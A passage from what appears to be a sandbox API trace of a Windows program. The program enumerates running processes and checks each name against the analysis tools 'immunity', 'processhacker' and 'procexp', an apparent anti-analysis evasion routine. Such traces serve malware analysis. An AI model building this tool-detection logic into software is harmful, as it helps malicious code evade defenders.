th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="disclaimer_saudi_agreed_oem.exe")) returned 1 [0083.007] StrStrIW (lpFirst="disclaimer_saudi_agreed_oem.exe", lpSrch="immunity") returned 0x0 [0083.007] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="colleague wrap.exe")) returned 1 [0083.008] StrStrIW (lpFirst="colleague wrap.exe", lpSrch="immunity") returned 0x0 [0083.008] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="hottest-jm-depression-fought.exe")) returned 1 [0083.008] StrStrIW (lpFirst="hottest-jm-depression-fought.exe", lpSrch="immunity") returned 0x0 [0083.008] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="saturday.exe")) returned 1 [0083.009] StrStrIW (lpFirst="saturday.exe", lpSrch="immunity") returned 0x0 [0083.009] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="WINWORD.EXE")) returned 1 [0083.009] StrStrIW (lpFirst="WINWORD.EXE", lpSrch="immunity") returned 0x0 [0083.009] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.009] StrStrIW (lpFirst="svchost.exe", lpSrch="immunity") returned 0x0 [0083.009] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0083.010] StrStrIW (lpFirst="OSPPSVC.EXE", lpSrch="immunity") returned 0x0 [0083.010] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0083.010] StrStrIW (lpFirst="sppsvc.exe", lpSrch="immunity") returned 0x0 [0083.010] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.010] StrStrIW (lpFirst="svchost.exe", lpSrch="immunity") returned 0x0 [0083.010] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x65c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xa50, pcPriClassBase=8, dwFlags=0x0, szExeFile="iuoldw.exe")) returned 1 [0083.011] StrStrIW (lpFirst="iuoldw.exe", lpSrch="immunity") returned 0x0 [0083.011] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x65c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xa50, pcPriClassBase=8, dwFlags=0x0, szExeFile="iuoldw.exe")) returned 0 [0083.011] CloseHandle (hObject=0x148) returned 1 [0083.011] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x148 [0083.013] Process32FirstW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0083.013] StrStrIW (lpFirst="[System Process]", lpSrch="processhacker") returned 0x0 [0083.013] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0083.014] StrStrIW (lpFirst="System", lpSrch="processhacker") returned 0x0 [0083.014] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0083.014] StrStrIW (lpFirst="smss.exe", lpSrch="processhacker") returned 0x0 [0083.014] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0083.014] StrStrIW (lpFirst="csrss.exe", lpSrch="processhacker") returned 0x0 [0083.014] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0083.015] StrStrIW (lpFirst="wininit.exe", lpSrch="processhacker") returned 0x0 [0083.015] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0083.015] StrStrIW (lpFirst="csrss.exe", lpSrch="processhacker") returned 0x0 [0083.015] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0083.016] StrStrIW (lpFirst="winlogon.exe", lpSrch="processhacker") returned 0x0 [0083.016] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0083.016] StrStrIW (lpFirst="services.exe", lpSrch="processhacker") returned 0x0 [0083.016] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0083.017] StrStrIW (lpFirst="lsass.exe", lpSrch="processhacker") returned 0x0 [0083.017] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0083.017] StrStrIW (lpFirst="lsm.exe", lpSrch="processhacker") returned 0x0 [0083.017] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.017] StrStrIW (lpFirst="svchost.exe", lpSrch="processhacker") returned 0x0 [0083.017] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.018] StrStrIW (lpFirst="svchost.exe", lpSrch="processhacker") returned 0x0 [0083.018] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.018] StrStrIW (lpFirst="svchost.exe", lpSrch="processhacker") returned 0x0 [0083.018] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.019] StrStrIW (lpFirst="svchost.exe", lpSrch="processhacker") returned 0x0 [0083.019] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.019] StrStrIW (lpFirst="svchost.exe", lpSrch="processhacker") returned 0x0 [0083.019] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0083.019] StrStrIW (lpFirst="audiodg.exe", lpSrch="processhacker") returned 0x0 [0083.019] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.020] StrStrIW (lpFirst="svchost.exe", lpSrch="processhacker") returned 0x0 [0083.020] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.020] StrStrIW (lpFirst="svchost.exe", lpSrch="processhacker") returned 0x0 [0083.020] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x160, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0083.021] StrStrIW (lpFirst="spoolsv.exe", lpSrch="processhacker") returned 0x0 [0083.021] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.021] StrStrIW (lpFirst="svchost.exe", lpSrch="processhacker") returned 0x0 [0083.021] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0083.021] StrStrIW (lpFirst="OfficeClickToRun.exe", lpSrch="processhacker") returned 0x0 [0083.021] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0083.022] StrStrIW (lpFirst="taskhost.exe", lpSrch="processhacker") returned 0x0 [0083.022] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x314, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0083.022] StrStrIW (lpFirst="dwm.exe", lpSrch="processhacker") returned 0x0 [0083.022] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x544, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0083.022] StrStrIW (lpFirst="explorer.exe", lpSrch="processhacker") returned 0x0 [0083.023] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x600, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0083.023] StrStrIW (lpFirst="taskeng.exe", lpSrch="processhacker") returned 0x0 [0083.023] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x35c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0083.023] StrStrIW (lpFirst="taskeng.exe", lpSrch="processhacker") returned 0x0 [0083.023] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0083.024] StrStrIW (lpFirst="ONENOTEM.EXE", lpSrch="processhacker") returned 0x0 [0083.024] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0083.024] StrStrIW (lpFirst="WmiPrvSE.exe", lpSrch="processhacker") returned 0x0 [0083.024] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0083.024] StrStrIW (lpFirst="taskhost.exe", lpSrch="processhacker") returned 0x0 [0083.025] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="undertake.exe")) returned 1 [0083.025] StrStrIW (lpFirst="undertake.exe", lpSrch="processhacker") returned 0x0 [0083.025] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="luxury-westminster-editing-cube.exe")) returned 1 [0083.025] StrStrIW (lpFirst="luxury-westminster-editing-cube.exe", lpSrch="processhacker") returned 0x0 [0083.025] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="devon stickers.exe")) returned 1 [0083.026] StrStrIW (lpFirst="devon stickers.exe", lpSrch="processhacker") returned 0x0 [0083.026] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="eagles_podcast_type_marker.exe")) returned 1 [0083.026] StrStrIW (lpFirst="eagles_podcast_type_marker.exe", lpSrch="processhacker") returned 0x0 [0083.026] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="groups.exe")) returned 1 [0083.027] StrStrIW (lpFirst="groups.exe", lpSrch="processhacker") returned 0x0 [0083.027] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="filesdetectedlosebenjamin.exe")) returned 1 [0083.027] StrStrIW (lpFirst="filesdetectedlosebenjamin.exe", lpSrch="processhacker") returned 0x0 [0083.027] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="cincinnati consumers se.exe")) returned 1 [0083.027] StrStrIW (lpFirst="cincinnati consumers se.exe", lpSrch="processhacker") returned 0x0 [0083.027] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="simply_wa_thumbnail_programmers.exe")) returned 1 [0083.028] StrStrIW (lpFirst="simply_wa_thumbnail_programmers.exe", lpSrch="processhacker") returned 0x0 [0083.028] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x848, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="medicaid.exe")) returned 1 [0083.028] StrStrIW (lpFirst="medicaid.exe", lpSrch="processhacker") returned 0x0 [0083.028] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="gateway.exe")) returned 1 [0083.029] StrStrIW (lpFirst="gateway.exe", lpSrch="processhacker") returned 0x0 [0083.029] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="laden.exe")) returned 1 [0083.029] StrStrIW (lpFirst="laden.exe", lpSrch="processhacker") returned 0x0 [0083.029] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="lying-yourself.exe")) returned 1 [0083.029] StrStrIW (lpFirst="lying-yourself.exe", lpSrch="processhacker") returned 0x0 [0083.029] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="disclaimer_saudi_agreed_oem.exe")) returned 1 [0083.030] StrStrIW (lpFirst="disclaimer_saudi_agreed_oem.exe", lpSrch="processhacker") returned 0x0 [0083.030] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="colleague wrap.exe")) returned 1 [0083.030] StrStrIW (lpFirst="colleague wrap.exe", lpSrch="processhacker") returned 0x0 [0083.030] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="hottest-jm-depression-fought.exe")) returned 1 [0083.031] StrStrIW (lpFirst="hottest-jm-depression-fought.exe", lpSrch="processhacker") returned 0x0 [0083.031] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="saturday.exe")) returned 1 [0083.031] StrStrIW (lpFirst="saturday.exe", lpSrch="processhacker") returned 0x0 [0083.031] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="WINWORD.EXE")) returned 1 [0083.032] StrStrIW (lpFirst="WINWORD.EXE", lpSrch="processhacker") returned 0x0 [0083.032] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.032] StrStrIW (lpFirst="svchost.exe", lpSrch="processhacker") returned 0x0 [0083.032] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0083.032] StrStrIW (lpFirst="OSPPSVC.EXE", lpSrch="processhacker") returned 0x0 [0083.032] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0083.033] StrStrIW (lpFirst="sppsvc.exe", lpSrch="processhacker") returned 0x0 [0083.033] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.033] StrStrIW (lpFirst="svchost.exe", lpSrch="processhacker") returned 0x0 [0083.033] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x65c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xa50, pcPriClassBase=8, dwFlags=0x0, szExeFile="iuoldw.exe")) returned 1 [0083.034] StrStrIW (lpFirst="iuoldw.exe", lpSrch="processhacker") returned 0x0 [0083.034] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x65c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xa50, pcPriClassBase=8, dwFlags=0x0, szExeFile="iuoldw.exe")) returned 0 [0083.034] CloseHandle (hObject=0x148) returned 1 [0083.034] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x148 [0083.036] Process32FirstW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0083.036] StrStrIW (lpFirst="[System Process]", lpSrch="procexp") returned 0x0 [0083.036] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0083.037] StrStrIW (lpFirst="System", lpSrch="procexp") returned 0x0 [0083.037] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0083.037] StrStrIW (lpFirst="smss.exe", lpSrch="procexp") returned 0x0 [0083.037] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0083.038] StrStrIW (lpFirst="csrss.exe", lpSrch="procexp") returned 0x0 [0083.038] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: 